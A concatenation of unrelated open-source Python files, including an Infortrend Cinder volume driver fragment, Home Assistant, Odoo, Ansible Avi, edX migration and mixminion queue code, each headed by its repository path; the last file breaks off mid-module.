return wwpn_list, wwpn_channel_info
@log_func
def _generate_iscsi_connection_properties(
self, property_value, volume):
properties = {}
discovery_exist = False
specific_property = property_value[0]
discovery_ip = '%s:%s' % (
specific_property['ip'], specific_property['port'])
discovery_iqn = specific_property['iqn']
if self._do_iscsi_discovery(discovery_iqn, discovery_ip):
properties['target_portal'] = discovery_ip
properties['target_iqn'] = discovery_iqn
properties['target_lun'] = int(specific_property['lun_id'])
discovery_exist = True
if not discovery_exist:
msg = _(
'Could not find iSCSI target '
'for volume: %(volume_id)s.') % {
'volume_id': volume['id']}
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
properties['target_discovered'] = discovery_exist
properties['volume_id'] = volume['id']
if 'provider_auth' in volume:
auth = volume['provider_auth']
if auth:
(auth_method, auth_username, auth_secret) = auth.split()
properties['auth_method'] = auth_method
properties['auth_username'] = auth_username
properties['auth_password'] = auth_secret
return {
'driver_volume_type': 'iscsi',
'data': properties,
}
@log_func
def _do_iscsi_discovery(self, target_iqn, target_ip):
rc, out = self._execute(
'ExecuteCommand',
'iscsiadm', '-m', 'discovery',
'-t', 'sendtargets', '-p',
target_ip,
run_as_root=True)
if rc != 0:
LOG.error(_LE(
'Can not discovery in %(target_ip)s with %(target_iqn)s.'), {
'target_ip': target_ip, 'target_iqn': target_iqn})
return False
else:
for target in out.splitlines():
if target_iqn in target and target_ip in target:
return True
return False
def extend_volume(self, volume, new_size):
volume_id = volume['id'].replace('-', '')
part_id = self._extract_specific_provider_location(
volume['provider_location'], 'partition_id')
if part_id is None:
part_id = self._get_part_id(volume_id)
expand_size = new_size - volume['size']
if '.' in ('%s' % expand_size):
expand_size = round(gi_to_mi(float(expand_size)))
expand_command = 'size=%sMB' % expand_size
else:
expand_command = 'size=%sGB' % expand_size
self._execute('SetPartition', 'expand', part_id, expand_command)
LOG.info(_LI(
'Successfully extended volume %(volume_id)s to size %(size)s.'), {
'volume_id': volume['id'], 'size': new_size})
@lockutils.synchronized('connection', 'infortrend-', True)
def terminate_connection(self, volume, connector):
volume_id = volume['id'].replace('-', '')
multipath = connector.get('multipath', False)
conn_info = None
part_id = self._extract_specific_provider_location(
volume['provider_location'], 'partition_id')
if part_id is None:
part_id = self._get_part_id(volume_id)
self._execute('DeleteMap', 'part', part_id, '-y')
map_info = self._update_map_info(multipath)
if self.protocol == 'iSCSI':
initiator_iqn = self._truncate_host_name(connector['initiator'])
lun_map_exist = self._check_initiator_has_lun_map(
initiator_iqn, map_info)
if not lun_map_exist:
self._execute('DeleteIQN', initiator_iqn)
elif self.protocol == 'FC':
conn_info = {'driver_volume_type': 'fibre_channel',
'data': {}}
lun_map_exist = self._check_initiator_has_lun_map(
connector['wwpns'], map_info)
if not lun_map_exist:
wwpn_list, wwpn_channel_info = self._get_wwpn_list()
init_target_map, target_wwpns = (
self._build_initiator_target_map(connector, wwpn_list)
)
conn_info['data']['initiator_target_map'] = init_target_map
LOG.info(_LI(
'Successfully terminated connection for volume: %(volume_id)s.'), {
'volume_id': volume['id']})
return conn_info
def migrate_volume(self, volume, host, new_extraspecs=None):
is_valid, dst_pool_id = (
self._is_valid_for_storage_assisted_migration(host)
)
if not is_valid:
return (False, None)
model_dict = self._migrate_volume_with_pool(
volume, dst_pool_id, new_extraspecs)
model_update = {
"provider_location": self._concat_provider_location(model_dict),
}
LOG.info(_LI('Migrate Volume %(volume_id)s completed.'), {
'volume_id': volume['id']})
return (True, model_update)
def _is_valid_for_storage_assisted_migration(self, host):
if 'pool_id' not in host['capabilities']:
LOG.warning(_LW('Failed to get target pool id.'))
return (False, None)
dst_pool_id = host['capabilities']['pool_id']
if dst_pool_id is None:
return (False, None)
return (True, dst_pool_id)
def _migrate_volume_with_pool(self, volume, dst_pool_id, extraspecs=None):
volume_id = volume['id'].replace('-', '')
# Get old partition data for delete map
partition_data = self._extract_all_provider_location(
volume['provider_location'])
src_part_id = partition_data['partition_id']
if src_part_id is None:
src_part_id = self._get_part_id(volume_id)
# Create New Partition
self._create_partition_with_pool(volume, dst_pool_id, extraspecs)
dst_part_id = self._get_part_id(
volume_id, pool_id=dst_pool_id)
if dst_part_id is None:
msg = _('Failed to get new part id in new pool: %(pool_id)s.') % {
'pool_id': dst_pool_id}
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
# Volume Mirror from old partition into new partition
commands = (
'Cinder-Migrate', 'part', src_part_id, 'part', dst_part_id,
'type=mirror'
)
self._execute('CreateReplica', *commands)
self._wait_replica_complete(dst_part_id)
self._execute('DeleteMap', 'part', src_part_id, '-y')
self._execute('DeletePartition', src_part_id, '-y')
model_dict = {
'system_id': partition_data['system_id'],
'partition_id': dst_part_id,
}
return model_dict
def _wait_replica_complete(self, part_id):
start_time = int(time.time())
timeout = self._replica_timeout
def _inner():
check_done = False
try:
rc, replica_list = self._execute('ShowReplica', '-l')
for entry in replica_list:
if (entry['Target'] == part_id and
self._check_replica_completed(entry)):
check_done = True
self._execute('DeleteReplica', entry['Pair-ID'], '-y')
except Exception:
check_done = False
LOG.exception(_LE('Cannot detect replica status.'))
if check_done:
raise loopingcall.LoopingCallDone()
if int(time.time()) - start_time > timeout:
msg = _('Wait replica complete timeout.')
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
timer = loopingcall.FixedIntervalLoopingCall(_inner)
timer.start(interval=10).wait()
def _check_extraspec_value(self, extraspec, validvalues):
if not extraspec:
LOG.debug("The given extraspec is None.")
elif extraspec not in validvalues:
msg = _("The extraspec: %(extraspec)s is not valid.") % {
'extraspec': extraspec}
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
def _get_enable_specs_on_array(self):
enable_specs = {}
rc, license_list = self._execute('ShowLicense')
for key, value in license_list.items():
if value['Support']:
enable_specs[key] = value
return enable_specs
def manage_existing_get_size(self, volume, ref):
"""Return size of volume to be managed by manage_existing."""
volume_name = self._get_existing_volume_ref_name(ref)
part_entry = self._get_latter_volume_dict(volume_name)
if part_entry is None:
msg = _('Specified logical volume does not exist.')
LOG.error(msg)
raise exception.ManageExistingInvalidReference(
existing_ref=ref, reason=msg)
rc, map_info = self._execute('ShowMap', 'part=%s' % part_entry['ID'])
if len(map_info) != 0:
msg = _('The specified volume is mapped to a host.')
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
return int(math.ceil(mi_to_gi(float(part_entry['Size']))))
def manage_existing(self, volume, ref):
volume_name = self._get_existing_volume_ref_name(ref)
volume_id = volume['id'].replace('-', '')
part_entry = self._get_latter_volume_dict(volume_name)
if part_entry is None:
msg = _('Specified logical volume does not exist.')
LOG.error(msg)
raise exception.ManageExistingInvalidReference(
existing_ref=ref, reason=msg)
self._execute('SetPartition', part_entry['ID'], 'name=%s' % volume_id)
model_dict = {
'system_id': self._get_system_id(self.ip),
'partition_id': part_entry['ID'],
}
model_update = {
"provider_location": self._concat_provider_location(model_dict),
}
LOG.info(_LI('Rename Volume %(volume_id)s completed.'), {
'volume_id': volume['id']})
return model_update
def _get_existing_volume_ref_name(self, ref):
volume_name = None
if 'source-name' in ref:
volume_name = ref['source-name']
elif 'source-id' in ref:
volume_name = self._get_unmanaged_volume_name(
ref['source-id'].replace('-', ''))
else:
msg = _('Reference must contain source-id or source-name.')
LOG.error(msg)
raise exception.ManageExistingInvalidReference(
existing_ref=ref, reason=msg)
return volume_name
def unmanage(self, volume):
volume_id = volume['id'].replace('-', '')
part_id = self._extract_specific_provider_location(
volume['provider_location'], 'partition_id')
if part_id is None:
part_id = self._get_part_id(volume_id)
new_vol_name = self._get_unmanaged_volume_name(volume_id)
self._execute('SetPartition', part_id, 'name=%s' % new_vol_name)
LOG.info(_LI('Unmanage volume %(volume_id)s completed.'), {
'volume_id': volume_id})
def _get_unmanaged_volume_name(self, volume_id):
return self.unmanaged_prefix % volume_id[:-17]
def _get_specific_volume_dict(self, volume_id):
ref_dict = {}
rc, part_list = self._execute('ShowPartition')
for entry in part_list:
if entry['Name'] == volume_id:
ref_dict = entry
break
return ref_dict
def _get_latter_volume_dict(self, volume_name):
rc, part_list = self._execute('ShowPartition', '-l')
latest_timestamps = 0
ref_dict = None
for entry in part_list:
if entry['Name'] == volume_name:
timestamps = self._get_part_timestamps(
entry['Creation-time'])
if timestamps > latest_timestamps:
ref_dict = entry
latest_timestamps = timestamps
return ref_dict
def _get_part_timestamps(self, time_string):
"""Transform 'Sat, Jan 11 22:18:40 2020' into timestamps with sec."""
first, value = time_string.split(',')
timestamps = time.mktime(
time.strptime(value, " %b %d %H:%M:%S %Y"))
return timestamps
def _check_volume_attachment(self, volume):
if not volume['volume_attachment']:
return False
return True
def _check_volume_has_snapshot(self, volume):
part_id = self._extract_specific_provider_location(
volume['provider_location'], 'partition_id')
rc, snapshot_list = self._execute('ShowSnapshot', 'part=%s' % part_id)
if len(snapshot_list) > 0:
return True
return False
def retype(self, ctxt, volume, new_type, diff, host):
"""Convert the volume to be of the new type."""
if volume['host'] != host['host']:
if self._check_volume_attachment(volume):
LOG.warning(_LW(
'Volume %(volume_id)s cannot be retyped '
'during attachment.'), {
'volume_id': volume['id']})
return False
if self._check_volume_has_snapshot(volume):
LOG.warning(_LW(
'Volume %(volume_id)s cannot be retyped '
'because it has snapshot.'), {
'volume_id': volume['id']})
return False
new_extraspecs = new_type['extra_specs']
rc, model_update = self.migrate_volume(
volume, host, new_extraspecs)
if rc:
LOG.info(_LI(
'Retype Volume %(volume_id)s is done '
'and migrated to pool %(pool_id)s.'), {
'volume_id': volume['id'],
'pool_id': host['capabilities']['pool_id']})
return (rc, model_update)
else:
if ('infortrend_provisioning' in diff['extra_specs'] and
(diff['extra_specs']['infortrend_provisioning'][0] !=
diff['extra_specs']['infortrend_provisioning'][1])):
LOG.warning(_LW(
'The provisioning: %(provisioning)s '
'is not valid.'), {
'provisioning':
diff['extra_specs']['infortrend_provisioning'][1]})
return False
LOG.info(_LI('Retype Volume %(volume_id)s is completed.'), {
'volume_id': volume['id']})
return True
def update_migrated_volume(self, ctxt, volume, new_volume,
original_volume_status):
"""Return model update for migrated volume."""
src_volume_id = volume['id'].replace('-', '')
dst_volume_id = new_volume['id'].replace('-', '')
part_id = self._extract_specific_provider_location(
new_volume['provider_location'], 'partition_id')
if part_id is None:
part_id = self._get_part_id(dst_volume_id)
LOG.debug(
'Rename partition %(part_id)s '
'into new volume %(new_volume)s.', {
'part_id': part_id, 'new_volume': dst_volume_id})
try:
self._execute('SetPartition', part_id, 'name=%s' % src_volume_id)
except exception.InfortrendCliException:
LOG.exception(_LE('Failed to rename %(new_volume)s into '
'%(volume)s.'), {'new_volume': new_volume['id'],
'volume': volume['id']})
return {'_name_id': new_volume['_name_id'] or new_volume['id']}
LOG.info(_LI('Update migrated volume %(new_volume)s completed.'), {
'new_volume': new_volume['id']})
model_update = {
'_name_id': None,
'provider_location': new_volume['provider_location'],
}
return model_update
|
w1ll1am23/home-assistant
|
refs/heads/dev
|
homeassistant/components/water_heater/group.py
|
12
|
"""Describe group states."""
from homeassistant.components.group import GroupIntegrationRegistry
from homeassistant.const import STATE_OFF
from homeassistant.core import callback
from homeassistant.helpers.typing import HomeAssistantType
from . import (
STATE_ECO,
STATE_ELECTRIC,
STATE_GAS,
STATE_HEAT_PUMP,
STATE_HIGH_DEMAND,
STATE_PERFORMANCE,
)
@callback
def async_describe_on_off_states(
hass: HomeAssistantType, registry: GroupIntegrationRegistry
) -> None:
"""Describe group on off states."""
registry.on_off_states(
{
STATE_ECO,
STATE_ELECTRIC,
STATE_PERFORMANCE,
STATE_HIGH_DEMAND,
STATE_HEAT_PUMP,
STATE_GAS,
},
STATE_OFF,
)
|
NYCPython/irclogs
|
refs/heads/master
|
manage.py
|
1
|
from flask.ext.migrate import Migrate, MigrateCommand
from flask.ext.script import Manager
from irclogs.core import create_app, db
from irclogs.views import frontend
app = create_app()
manager = Manager(app)
migrate = Migrate(app, db)
manager.add_command('db', MigrateCommand)
if __name__ == '__main__':
manager.run()
|
bobisme/odoo
|
refs/heads/sp-8.0
|
addons/account/res_currency.py
|
340
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2010 OpenERP s.a. (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import osv
"""Inherit res.currency to handle accounting date values when converting currencies"""
class res_currency_account(osv.osv):
_inherit = "res.currency"
def _get_conversion_rate(self, cr, uid, from_currency, to_currency, context=None):
if context is None:
context = {}
rate = super(res_currency_account, self)._get_conversion_rate(cr, uid, from_currency, to_currency, context=context)
#process the case where the account doesn't work with an outgoing currency rate method 'at date' but 'average'
account = context.get('res.currency.compute.account')
account_invert = context.get('res.currency.compute.account_invert')
if account and account.currency_mode == 'average' and account.currency_id:
query = self.pool.get('account.move.line')._query_get(cr, uid, context=context)
cr.execute('select sum(debit-credit),sum(amount_currency) from account_move_line l ' \
'where l.currency_id=%s and l.account_id=%s and '+query, (account.currency_id.id,account.id,))
tot1,tot2 = cr.fetchone()
if tot2 and not account_invert:
rate = float(tot1)/float(tot2)
elif tot1 and account_invert:
rate = float(tot2)/float(tot1)
return rate
|
tchernomax/ansible
|
refs/heads/devel
|
lib/ansible/modules/network/avi/avi_pkiprofile.py
|
20
|
#!/usr/bin/python
#
# @author: Gaurav Rastogi (grastogi@avinetworks.com)
# Eric Anderson (eanderson@avinetworks.com)
# module_check: supported
# Avi Version: 17.1.1
#
# Copyright: (c) 2017 Gaurav Rastogi, <grastogi@avinetworks.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: avi_pkiprofile
author: Gaurav Rastogi (grastogi@avinetworks.com)
short_description: Module for setup of PKIProfile Avi RESTful Object
description:
- This module is used to configure PKIProfile object
- more examples at U(https://github.com/avinetworks/devops)
requirements: [ avisdk ]
version_added: "2.3"
options:
state:
description:
- The state that should be applied on the entity.
default: present
choices: ["absent", "present"]
avi_api_update_method:
description:
- Default method for object update is HTTP PUT.
- Setting to patch will override that behavior to use HTTP PATCH.
version_added: "2.5"
default: put
choices: ["put", "patch"]
avi_api_patch_op:
description:
- Patch operation to use when using avi_api_update_method as patch.
version_added: "2.5"
choices: ["add", "replace", "delete"]
ca_certs:
description:
- List of certificate authorities (root and intermediate) trusted that is used for certificate validation.
created_by:
description:
- Creator name.
crl_check:
description:
- When enabled, avi will verify via crl checks that certificates in the trust chain have not been revoked.
- Default value when not specified in API or module is interpreted by Avi Controller as True.
type: bool
crls:
description:
- Certificate revocation lists.
ignore_peer_chain:
description:
- When enabled, avi will not trust intermediate and root certs presented by a client.
- Instead, only the chain certs configured in the certificate authority section will be used to verify trust of the client's cert.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
type: bool
is_federated:
description:
- This field describes the object's replication scope.
- If the field is set to false, then the object is visible within the controller-cluster and its associated service-engines.
- If the field is set to true, then the object is replicated across the federation.
- Field introduced in 17.1.3.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
version_added: "2.4"
type: bool
name:
description:
- Name of the pki profile.
required: true
tenant_ref:
description:
- It is a reference to an object of type tenant.
url:
description:
- Avi controller URL of the object.
uuid:
description:
- Unique object identifier of the object.
validate_only_leaf_crl:
description:
- When enabled, avi will only validate the revocation status of the leaf certificate using crl.
- To enable validation for the entire chain, disable this option and provide all the relevant crls.
- Default value when not specified in API or module is interpreted by Avi Controller as True.
type: bool
extends_documentation_fragment:
- avi
'''
EXAMPLES = """
- name: Example to create PKIProfile object
avi_pkiprofile:
controller: 10.10.25.42
username: admin
password: something
state: present
name: sample_pkiprofile
"""
RETURN = '''
obj:
description: PKIProfile (api/pkiprofile) object
returned: success, changed
type: dict
'''
from ansible.module_utils.basic import AnsibleModule
try:
from ansible.module_utils.network.avi.avi import (
avi_common_argument_spec, HAS_AVI, avi_ansible_api)
except ImportError:
HAS_AVI = False
def main():
argument_specs = dict(
state=dict(default='present',
choices=['absent', 'present']),
avi_api_update_method=dict(default='put',
choices=['put', 'patch']),
avi_api_patch_op=dict(choices=['add', 'replace', 'delete']),
ca_certs=dict(type='list',),
created_by=dict(type='str',),
crl_check=dict(type='bool',),
crls=dict(type='list',),
ignore_peer_chain=dict(type='bool',),
is_federated=dict(type='bool',),
name=dict(type='str', required=True),
tenant_ref=dict(type='str',),
url=dict(type='str',),
uuid=dict(type='str',),
validate_only_leaf_crl=dict(type='bool',),
)
argument_specs.update(avi_common_argument_spec())
module = AnsibleModule(
argument_spec=argument_specs, supports_check_mode=True)
if not HAS_AVI:
return module.fail_json(msg=(
'Avi python API SDK (avisdk>=17.1) is not installed. '
'For more details visit https://github.com/avinetworks/sdk.'))
return avi_ansible_api(module, 'pkiprofile',
set([]))
if __name__ == '__main__':
main()
|
fengbaicanhe/intellij-community
|
refs/heads/master
|
python/testData/refactoring/unwrap/elseInIfUnwrap_after.py
|
83
|
z = 3
|
intrack/BoofCV-master
|
refs/heads/master
|
main/geo/generate/python/P3PFinsterwalder.py
|
2
|
# One type-o was found in this section of the paper. Validating other equations in an attempt to hunt down problems
from sage.all import *
from utilsymbolic import *
(A,B,C,D,E,F)=var('A,B,C,D,E,F')
(l,cos23,cos12,cos13)=var('l,cos23,cos12,cos13')
(a,b,c)=var('a,b,c')
# Validating equation (14)
eq = C*(A*F - D**2) + B*(2*D*E - B*F) - A*E**2
eq = eq.substitute(A = 1 + l)
eq = eq.substitute(B = -cos23)
eq = eq.substitute(C = 1 - a**2/b**2 - l*c**2/b**2)
eq = eq.substitute(D = -l*cos12)
eq = eq.substitute(E = (a**2/b**2 + l*c**2/b**2)*cos13)
eq = eq.substitute(F = -a**2/b**2 + l*(1-c**2/b**2))
eq *= b**4
print 'double J = '+extractNotVarEq(eq,'l')+';'
print 'double I = '+extractVarEq(eq,'l')+';'
print 'double H = '+extractVarEq(eq,'l^2')+';'
print 'double G = '+extractVarEq(eq,'l^3')+';'
|
DefyVentures/edx-platform
|
refs/heads/master
|
lms/djangoapps/shoppingcart/migrations/0002_auto__add_field_paidcourseregistration_mode.py
|
182
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'PaidCourseRegistration.mode'
db.add_column('shoppingcart_paidcourseregistration', 'mode',
self.gf('django.db.models.fields.SlugField')(default='honor', max_length=50),
keep_default=False)
def backwards(self, orm):
# Deleting field 'PaidCourseRegistration.mode'
db.delete_column('shoppingcart_paidcourseregistration', 'mode')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'shoppingcart.certificateitem': {
'Meta': {'object_name': 'CertificateItem', '_ormbases': ['shoppingcart.OrderItem']},
'course_enrollment': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['student.CourseEnrollment']"}),
'course_id': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_index': 'True'}),
'mode': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'orderitem_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['shoppingcart.OrderItem']", 'unique': 'True', 'primary_key': 'True'})
},
'shoppingcart.order': {
'Meta': {'object_name': 'Order'},
'bill_to_cardtype': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}),
'bill_to_ccnum': ('django.db.models.fields.CharField', [], {'max_length': '8', 'blank': 'True'}),
'bill_to_city': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_country': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_first': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_last': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_postalcode': ('django.db.models.fields.CharField', [], {'max_length': '16', 'blank': 'True'}),
'bill_to_state': ('django.db.models.fields.CharField', [], {'max_length': '8', 'blank': 'True'}),
'bill_to_street1': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'bill_to_street2': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'currency': ('django.db.models.fields.CharField', [], {'default': "'usd'", 'max_length': '8'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'processor_reply_dump': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'purchase_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'cart'", 'max_length': '32'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'shoppingcart.orderitem': {
'Meta': {'object_name': 'OrderItem'},
'currency': ('django.db.models.fields.CharField', [], {'default': "'usd'", 'max_length': '8'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'line_cost': ('django.db.models.fields.DecimalField', [], {'default': '0.0', 'max_digits': '30', 'decimal_places': '2'}),
'line_desc': ('django.db.models.fields.CharField', [], {'default': "'Misc. Item'", 'max_length': '1024'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Order']"}),
'qty': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'cart'", 'max_length': '32'}),
'unit_cost': ('django.db.models.fields.DecimalField', [], {'default': '0.0', 'max_digits': '30', 'decimal_places': '2'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'shoppingcart.paidcourseregistration': {
'Meta': {'object_name': 'PaidCourseRegistration', '_ormbases': ['shoppingcart.OrderItem']},
'course_id': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_index': 'True'}),
'mode': ('django.db.models.fields.SlugField', [], {'default': "'honor'", 'max_length': '50'}),
'orderitem_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['shoppingcart.OrderItem']", 'unique': 'True', 'primary_key': 'True'})
},
'student.courseenrollment': {
'Meta': {'ordering': "('user', 'course_id')", 'unique_together': "(('user', 'course_id'),)", 'object_name': 'CourseEnrollment'},
'course_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'mode': ('django.db.models.fields.CharField', [], {'default': "'honor'", 'max_length': '100'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
}
}
complete_apps = ['shoppingcart']
|
crooks/mixminion
|
refs/heads/master
|
lib/mixminion/server/ServerQueue.py
|
1
|
# Copyright 2002-2011 Nick Mathewson. See LICENSE for licensing information.
"""mixminion.server.ServerQueue
Facilities for retriable delivery queues, and for mix pools.
"""
import cPickle
import logging
import math
import os
import operator
import time
import stat
import sys
import threading
import mixminion.Filestore
from mixminion.Common import MixError, MixFatalError, secureDelete, \
createPrivateDir, readPickled, writePickled, formatTime, readFile, \
ceilDiv
from mixminion.Crypto import getCommonPRNG
from mixminion.Filestore import CorruptedFile
__all__ = [ 'DeliveryQueue', 'TimedMixPool', 'CottrellMixPool',
'BinomialCottrellMixPool', 'PerAddressDeliveryQueue' ]
log = logging.getLogger(__name__)
def _calculateNext(lastAttempt, firstAttempt, retrySchedule, canDrop, now):
"""DOCDOC"""
# If we've never tried to deliver the message, it's ready to
# go immediately.
if lastAttempt is None:
return now
# Otherwise, we count from the time the message was first queued,
# until we find a scheduled delivery that falls after the last
# attempted delivery.
#
# This scheduled delivery may be in the past. That's okay: it only
# means that we've missed a scheduled delivery, and we can try again
# immediately.
attempt = firstAttempt
for interval in retrySchedule:
attempt += interval
if attempt > lastAttempt:
return attempt
# Oops: there are no scheduled deliveries after the last delivery.
# Time to drop this message, or go into holding mode.
if canDrop:
return None
else:
if not retrySchedule or retrySchedule[-1]<5:
#DOCDOC
retrySchedule = [3600]
attempt += (ceilDiv(lastAttempt-attempt+60,retrySchedule[-1]) *
retrySchedule[-1])
return attempt
class _DeliveryState:
"""Helper class: holds the state needed to schedule delivery or
eventual abandonment of a message in a DeliveryQueue."""
## Fields:
# queuedTime: time at which the corresponding message was first
# inserted into the queue.
# lastAttempt: The most recent time at which we attempted to
# deliver the message. (None means 'never').
# address: Pickleable object holding address information. Delivery
# code uses this field to group messages by address before loading
# them all from disk. Must be usable as hash key.
# pendingAt: None (if we're not sending this message), or a time
# at which we begain sending this message.
# nextAttempt: None, or the time at which we'll next try to send
# this message. This field is invalid until someone calls
# setNextAttempt. If the time is in the past, delivery can
# be tried now. If None, the message may be removable.
def __init__(self, queuedTime=None, lastAttempt=None, address=None):
"""Create a new _DeliveryState for a message received at
queuedTime (default now), whose last delivery attempt was
at lastAttempt (default never)."""
if queuedTime is None:
queuedTime = time.time()
self.queuedTime = queuedTime
self.lastAttempt = lastAttempt
self.address = address
self.pending = None
self.nextAttempt = None
self.remove = 0
def isPending(self):
"""Return true iff we are currently trying to deliver this message."""
return self.pending is not None
def setPending(self, now=None):
"""Note that we are now trying to deliver this message, so that we
don't try to deliver it twice at the same time."""
if now is None:
now = time.time()
self.pending = now
def setNonPending(self):
"""Note that we are no longer trying to deliver this message, so that
we can try it again later."""
self.pending = None
def isRemovable(self):
"""Return true iff this message is old enough to be removed."""
return self.remove
def __getstate__(self):
# For pickling. All future versions of deliverystate will pickle
# to a tuple, whose first element will be a version string.
return ("V1", self.queuedTime, self.lastAttempt, self.address)
def __setstate__(self, state):
# For pickling.
if state[0] == "V1":
self.queuedTime = state[1]
self.lastAttempt = state[2]
self.address = state[3]
else:
#XXXX008 This is way too extreme.
raise MixFatalError("Unrecognized delivery state")
self.pending = None
self.nextAttempt = None
self.remove = 0
def setNextAttempt(self, retrySchedule, now=None):
"""Return the next time when we should try to deliver this message
according to the provided retrySchedule. If the time returned
is in the past, then immediate delivery is okay. If the time
returned is None, this message has expired and should be forgotten.
"""
if not now:
now = time.time()
self.remove = 0
self.nextAttempt = _calculateNext(self.lastAttempt, self.queuedTime,
retrySchedule, canDrop=1, now=now)
if self.nextAttempt is None:
self.remove = 1
def setLastAttempt(self, when):
"""Update time of the last attempted delivery."""
self.lastAttempt = when
class PendingMessage:
"""PendingMessage represents a message in a DeliveryQueue, for delivery
to a specific address. See DeliveryQueue._deliverMessages for more
information about the interface."""
##
# queue: the deliveryqueue holding this message
# handle: the handle for this message in the queue
# address: The address passed to queueDeliveryMessage for this message,
# or None
# message: The object queued as this message, or None if the object
# has not yet been loaded.
def __init__(self, handle, queue, address, message=None):
self.handle = handle
self.queue = queue
self.address = address
self.message = message
def getAddress(self):
return self.address
def getHandle(self):
return self.handle
def succeeded(self,now=None):
"""Mark this message as having been successfully deleted, removing
it from the queue."""
self.queue.deliverySucceeded(self.handle,now=now)
